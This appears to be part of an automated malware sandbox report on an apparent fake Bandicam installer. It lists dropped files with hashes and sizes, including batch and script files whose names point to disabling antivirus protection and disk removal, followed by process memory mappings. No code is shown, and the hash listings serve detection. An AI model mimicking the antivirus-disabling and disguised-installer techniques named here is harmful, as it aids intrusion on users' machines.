
SHA512
d1f82135c5c474c8f9071d2b24f16fa3c03f5a171bb6b474ab0dd6b8ade898000828b956e06f9e0025cdadd9d7d18e6d19edb123994c8268efff2449a636ca33

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\sgbY\DisableOAVProtection.bat
Filesize
136KB

MD5
ed77c2b2866fc09850a317f2620f4f9c

SHA1
ed1d7485a1111bd553ffe81927260652718a1c39

SHA256
763c290bbc1bfaedb53c909a63453d88204680ff6b5e50d7c68b14accc706c17

SHA512
4ed12352142c38750656780acf836805f3190a21aeab117e1c62fa06cf54920754c598daba3e02a981b6440261ce211e5717f6f1183cfebf6c8805d8201fa0e2

Download Submit
C:\ProgramData\sgbY\DiskRemoval.bat
Filesize
211B

MD5
0f00552cee3a31dc4e8adc2738ca6d76

SHA1
85f0353b58b6749eee6b06101b05db242d44d0c2

SHA256
1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

SHA512
137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

Download Submit
C:\ProgramData\sgbY\MMF.vbs
Filesize
67KB

MD5
62c210400fef1cb41efa4c8b2c963964

SHA1
fa471dcf721b5f61a8794a75e3a9226e79b3ec80

SHA256
ac5fa9691beee8045bc5b4e4ede4816339cbef901f4d7c83f70e64e8c5f10d10

SHA512
64d99cd6a739bee853820172b24408173c4799f6c61037ad212cb56434fba7f014f58b2f88bcd209fdfd5976a183cd3d91588fc8f274fced444e726cf8e25d5a

Download Submit
C:\ProgramData\sgbY\extracted\7852_protected.exe
Filesize
5.4MB

MD5
01b0d33ee024c172df883c1ec2a2b3db

SHA1
8b82450b9849452e90e37221eedb0eb391d3a6e8

SHA256
d56dc8166f5675238a118a62949cfb03504de1acbca39095aec27cfcb6168985

SHA512
d1f82135c5c474c8f9071d2b24f16fa3c03f5a171bb6b474ab0dd6b8ade898000828b956e06f9e0025cdadd9d7d18e6d19edb123994c8268efff2449a636ca33

Download Submit
C:\ProgramData\sgbY\extracted\ANTIAV~1.DAT
Filesize
2.0MB

MD5
d345388ca4b2337e0c544328f4202218

SHA1
8bda78abb3373d4c8e62e340dbf6d8605bb25085

SHA256
3cfbf9ad58384f2dc425bfd7c8927195c26d70bf13a980bd2f1fccbb0cd2886f

SHA512
384db137343f1f42bb1091a28187409d315be8958d2d271fdaf5c559c89fd777847d7795318e729fb1e55f0521e4c3df155c4a9266e4f00c0441d80ec84787e0

Download Submit
C:\ProgramData\sgbY\extracted\file_1.zip
Filesize
3.6MB

MD5
aba2cbb63036184508d374291d488f30

SHA1
844513180f7b8531f4405c733bb8e9a1e67f4f90

SHA256
e33d15853b3bf822e586fe9ab98ffb4a657a4efcf4d25bacd7e9378412646fa6

SHA512
22041480be0d2e25176838d72207c463545f880ab206adc32bd4f27644cf660720c51d73e49b5544b4a06c5a202443df92b1805350a88b5bcb217d920330c676

Download Submit
C:\ProgramData\sgbY\extracted\file_10.zip
Filesize
3.6MB

MD5
7aac0aed38801d08e0b05e00b9fe36ff

SHA1
b75c4b68d7582ffb083fcb8a93b3b06cbf6948de

SHA256
b531248ba90252ad6b5e79c4256ffd395536fc976e516762cf28a77894ed0d63

SHA512
d18a08d694a2917a4da2944a2ada6e2f0a796b39b1e3ed5a89755def4d4d85747cbb58e85d64b45f4cab39ec7202607223ce286e39aeb356eb9ea3c00f2ed345

Download Submit
C:\ProgramData\sgbY\extracted\file_11.zip
Filesize
5.0MB

MD5
37f6616edf5992b8d80670d086e73231

SHA1
ca97703e08fa2b0961017eab40a067931c2cd9e1

SHA256
5958859cae85d04970c1f1a4c74f5da183ebec6d99f17a4004e4813e24b1bc13

SHA512
bfcb1f14a3d32f00328e867c03d20211ada10006d56c2e3b830483051ddd55cc91e14dc820e746ff1868e9ee991d17ae69411da63b26b0ff10ae735a63269532

Download Submit
C:\ProgramData\sgbY\extracted\file_2.zip
Filesize
3.6MB

MD5
f3bcfed36486dc18c777f42d56abe8ba

SHA1
608c72bf73942b1b7cb8a9f67fc99f900fe39760

SHA256
3b0c050d23f8e6b27f64025a64b2365339e5eceb788bf41daf445b9404d70bce

SHA512
c2662306cf07150e58d1fd8ef5908dde3d9bded108445d17c902287c743c9fda5ff0f4030a8e0b23faf87c636b050ccf9539f31dbeadcf1ef078bb51905fb3c2

Download Submit
C:\ProgramData\sgbY\extracted\file_3.zip
Filesize
3.6MB

MD5
d0dfbb9ec72454ee69d0dcecf8b5acff

SHA1
288d86e5ce04d069f8c7ec7127a0dbd68e3810b6

SHA256
1b0a2c8f06de705f3e89f03312f2d8ffb88a98c9cdfda5e4bdb224328f4da500

SHA512
b051170201b41adc552c1ed8cd99ca19b64838e1bd7c747543c57f81fff6b7e2e713c5bf75bd8b1058bf055c5ce28220ec8f573d1bd550494aa57ed55ddac7e4

Download Submit
C:\ProgramData\sgbY\extracted\file_4.zip
Filesize
3.6MB

MD5
5c7ab071b01ecfadff4c056a80ca79a2

SHA1
82ed4d3f5b5db08d850688f09fd0e9df6ffacae4

SHA256
7d4388a0bd4e09ee6bd6fa028698977bd61374ecabf97f202179f75f4efb3363

SHA512
4f70ca24c45666c0c77b315777079b58a1e4e3d4fb3323f1325c4796a42b6adc770670162d1174b331591acc77c07352c61f590dc803e9daf83b73ba24d92a22

Download Submit
C:\ProgramData\sgbY\extracted\file_5.zip
Filesize
3.6MB

MD5
15e1b7f1d4572d075fc9a64cacf29548

SHA1
39c0e7b31f36f07a55e933bf3dc852a987cd9f23

SHA256
61acb868c19d141c384d2f3df936b3e5e7079af31401a2e0e70e63430335f957

SHA512
f42318ee107faafa512eead621b6ce49d87f3c205936d91175ec25349f9f6541a1bfc54368f19fd8c0e4e7ba8ea7ef0f51c7168919a2e488f251302a99f4b8ab

Download Submit
C:\ProgramData\sgbY\extracted\file_6.zip
Filesize
3.6MB

MD5
d7783a22fc81674b4e9f3307521a8b4a

SHA1
0834696d10982a1d053a890088f6d7cdfa5c7cc0

SHA256
c5a44c5d8de64d06e649123b89337dc26d98f0bd25e1ddbb4d948d62b31cd637

SHA512
e3e2d94b3f9b23054b81f813422fed7fa944476e34163cd844eabf6b6436ca2b322229cb0dabb84ccb7981a53a61b728a3f0451c777280f17a7619b65b22d645

Download Submit
C:\ProgramData\sgbY\extracted\file_7.zip
Filesize
3.6MB

MD5
dabb4587bc2053f6473b357aeca108c6

SHA1
c57db92131e6adca7bf5a7ff57136c03e4b4f242

SHA256
4ada05a86dfb3752b92d041d76162c6efc330d3d174b0a9dd0fdc8e4f7cd7cc0

SHA512
e9e56d0987f77a141f9c14023f1487c825147d1438bea5fc750439908ffae1265b2addc4f20af64058cb4ff812f6d687e23e6b685c9118cd6ccb1167d1758b9d

Download Submit
C:\ProgramData\sgbY\extracted\file_8.zip
Filesize
3.6MB

MD5
be4d97eb53062cbbbf89098006809e3d

SHA1
c66db13e20529159ed81e01c01624c3f32418462

SHA256
73cc7b2b168a40d22ea4ba3d259368326ccf96696cfb93275274d6db33463489

SHA512
406ae1f90123ed9fc32f4e950d6634a337fd3960b742fe84171624a2aea8f9a505bce41ba6fc3cb46da87140fb33f4de02f0f6b6cf21e0bf330e73f8b41945da

Download Submit
C:\ProgramData\sgbY\extracted\file_9.zip
Filesize
3.6MB

MD5
c5e3d933b71e22fde035453829cd4688

SHA1
37ba402176cc98f43e233ac10852d0b328f011c8

SHA256
10bf32b56d98d7124e646a7873eb38f820fb80a42d9c899047825665d0651a12

SHA512
f03c343ec3f0f3cac86613fb81cb2377acf0559fe4c375d1c75818675bf8bf98dd05ec8245902cdfa5610070129f02d2e995d49089dde06438178f6c9864096f

Download Submit
C:\ProgramData\sgbY\file.bin
Filesize
5.0MB

MD5
0de94362adf019a52ee60ad9d0487bfa

SHA1
4b90881d4bd5091faedb8b090e06a9252c6ad8fe

SHA256
e21070b1e42822a2e179768e03bee6ef1a1078617209f79c07ad0273b250fb7a

SHA512
4ad82b8533a3f643e50fb3c53e16e3390773590ddb338de249bb3ad4c5d6f039cc88d0b5872bdf34750e1b948ce917dc9e325e760250a59680bbf459dc6545b6

Download Submit
C:\ProgramData\sgbY\main.bat
Filesize
433B

MD5
cacd945d864368caad8cfc460fedb53e

SHA1
f4b680ed5abe93864a01dcde15efc83902183d5d

SHA256
d0225200299b27a0af71fa1faca7754b22ed252dc441ae58927ae47984f1460f

SHA512
b863ad5349e3b65c1d2c47c89119e4054c138c43dad3fe7f588152caf5006b3187c55e5e05d1c23f5eef3c4f61827232c33293a60bb96943670004f8b9eaaf84

Download Submit
C:\Users\Admin\AppData\Local\Temp\0e9e1b9d-2e60-4da2-9bef-9084f79207a0\D.dll
Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\b35bc50e-fc56-4239-a7d0-bb79118b31c9\AgileDotNetRT.dll
Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8V89B.tmp\4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
Filesize
2.5MB

MD5
5cea51722c4aebe9322f76a27370d7d8

SHA1
1e479681b9a61d7f42ed349780f0ae93f477b4c8

SHA256
a1b1f6c621428e180248736534ac0d23531f50ecaceaadfe420fed026ecc45a0

SHA512
fb10d9fce508894624902fbc18318b7fcfa0310141e340060b715ba0b060cfb04ecc9489d65915e50df1c74c47ced74ee69f0a668febe4f460ec409b4dcf7d87

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7QPP.tmp\b2p.dll
Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7QPP.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7QPP.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-I7QPP.tmp\iswin7logo.dll
Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-JDMO9.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-SQL3S.tmp\Bandicam.4.5.8.1673.tmp
Filesize
939KB

MD5
2624dd7f54b9132196ea129114ac9828

SHA1
50082f8b6e179fa509d1575fd4536abdcbf229fe

SHA256
9b92942e7066168d9b95fb9004abe21254b28a076ff1988bea781d75fc48276f

SHA512
fd07a56e7fd9289cc5e7ebd9b1185950a708ee5edd609be67d38be5364f549ff08014abfabd38b6df7bb223f9f9031f17a53c37614441ac37c2592e6df17b31e

Download Submit
memory/404-213-0x0000000000000000-mapping.dmp

Download
memory/448-194-0x0000000000000000-mapping.dmp

Download
memory/1076-166-0x0000000000000000-mapping.dmp

Download
memory/1136-168-0x0000000000000000-mapping.dmp

Download
memory/1212-197-0x0000000000000000-mapping.dmp

Download
memory/1216-172-0x0000000000000000-mapping.dmp

Download
memory/1356-151-0x0000000000000000-mapping.dmp

Download
memory/1460-148-0x0000000000000000-mapping.dmp

Download
memory/1468-253-0x0000000074450000-0x00000000744D9000-memory.dmp

Filesize
548KB

Download
memory/1468-243-0x0000000000000000-mapping.dmp

Download
memory/1468-247-0x0000000000F00000-0x00000000014A0000-memory.dmp

Filesize
5.6MB

Download
memory/1468-248-0x0000000000F00000-0x00000000014A0000-memory.dmp

Filesize
5.6MB

Download
memory/1468-250-0x0000000005110000-0x0000000005154000-memory.dmp

Filesize
272KB

Download
memory/1468-249-0x00000000057A0000-0x0000000005D44000-memory.dmp

Filesize
5.6MB

Download
memory/1468-251-0x0000000005290000-0x0000000005322000-memory.dmp

Filesize
584KB

Download
memory/1600-169-0x0000000000000000-mapping.dmp

Download
memory/1616-263-0x0000000000700000-0x0000000000793000-memory.dmp

Filesize
588KB

Download
memory/1616-266-0x0000000000700000-0x0000000000793000-memory.dmp

Filesize
588KB

Download
memory/1616-260-0x0000000000700000-0x0000000000793000-memory.dmp

Filesize
588KB

Download
memory/1616-257-0x0000000000000000-mapping.dmp

Download
memory/1640-152-0x0000000000000000-mapping.dmp

Download
memory/1808-173-0x0000000000000000-mapping.dmp

Download
memory/1844-210-0x0000000000000000-mapping.dmp

Download
memory/1940-209-0x0000000000000000-mapping.dmp

Download
memory/1948-206-0x0000000000000000-mapping.dmp

Download
memory/2276-198-0x0000000000000000-mapping.dmp

Download
memory/2316-221-0x0000000000000000-mapping.dmp

Download
memory/2380-205-0x0000000000000000-mapping.dmp

Download
memory/2544-204-0x0000000000000000-mapping.dmp

Download
memory/2596-182-0x0000000000000000-mapping.dmp

Download
memory/2728-187-0x0000000000000000-mapping.dmp

Download
memory/2928-225-0x0000000000000000-mapping.dmp

Download
memory/2968-136-0x0000000000000000-mapping.dmp

Download
memory/2968-138-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2968-149-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3032-208-0x0000000000000000-mapping.dmp

Download
memory/3080-237-0x0000000000000000-mapping.dmp

Download
memory/3152-207-0x0000000000000000-mapping.dmp

Download
memory/3268-171-0x0000000000000000-mapping.dmp

Download
memory/3440-159-0x0000000000000000-mapping.dmp

Download
memory/3528-163-0x0000000000000000-mapping.dmp

Download
memory/3692-176-0x0000000000000000-mapping.dmp

Download
memory/3696-153-0x0000000000000000-mapping.dmp

Download
memory/3800-212-0x0000000000000000-mapping.dmp

Download
memory/3876-150-0x0000000000000000-mapping.dmp

Download
memory/4044-217-0x0000000000000000-mapping.dmp

Download
memory/4196-201-0x0000000000000000-mapping.dmp

Download
memory/4200-154-0x0000000000000000-mapping.dmp

Download
memory/4212-174-0x0000000000000000-mapping.dmp

Download
memory/4224-164-0x0000000000000000-mapping.dmp

Download
memory/4372-157-0x0000000000000000-mapping.dmp

Download
memory/4400-155-0x0000000000000000-mapping.dmp

Download
memory/4412-156-0x0000000000000000-mapping.dmp

Download
memory/4484-131-0x0000000000400000-0x00000000004C7000-memory.dmp

Filesize
796KB

Download
memory/4484-146-0x0000000000400000-0x00000000004C7000-memory.dmp

Filesize
796KB

Download
memory/4524-211-0x0000000000000000-mapping.dmp

Download
memory/4632-183-0x0000000000000000-mapping.dmp

Download
memory/4712-177-0x0000000000000000-mapping.dmp

Download
memory/4736-170-0x0000000000000000-mapping.dmp

Download
memory/4740-192-0x0000000000000000-mapping.dmp

Download
memory/4760-229-0x0000000000000000-mapping.dmp

Download
memory/4768-233-0x0000000000000000-mapping.dmp

Download
memory/4800-133-0x0000000000000000-mapping.dmp

Download
memory/4812-199-0x0000000000000000-mapping.dmp

Download
memory/4912-162-0x00000000072A0000-0x00000000072AF000-memory.dmp

Filesize
60KB

Download
memory/4912-255-0x0000000072FB0000-0x0000000072FCB000-memory.dmp

Filesize
108KB

Download
memory/4912-141-0x0000000000000000-mapping.dmp

Download
memory/5012-143-0x0000000000000000-mapping.dmp

Download
memory/5064-188-0x0000000000000000-mapping.dmp

Download
memory/5084-181-0x0000000000000000-mapping.dmp

Download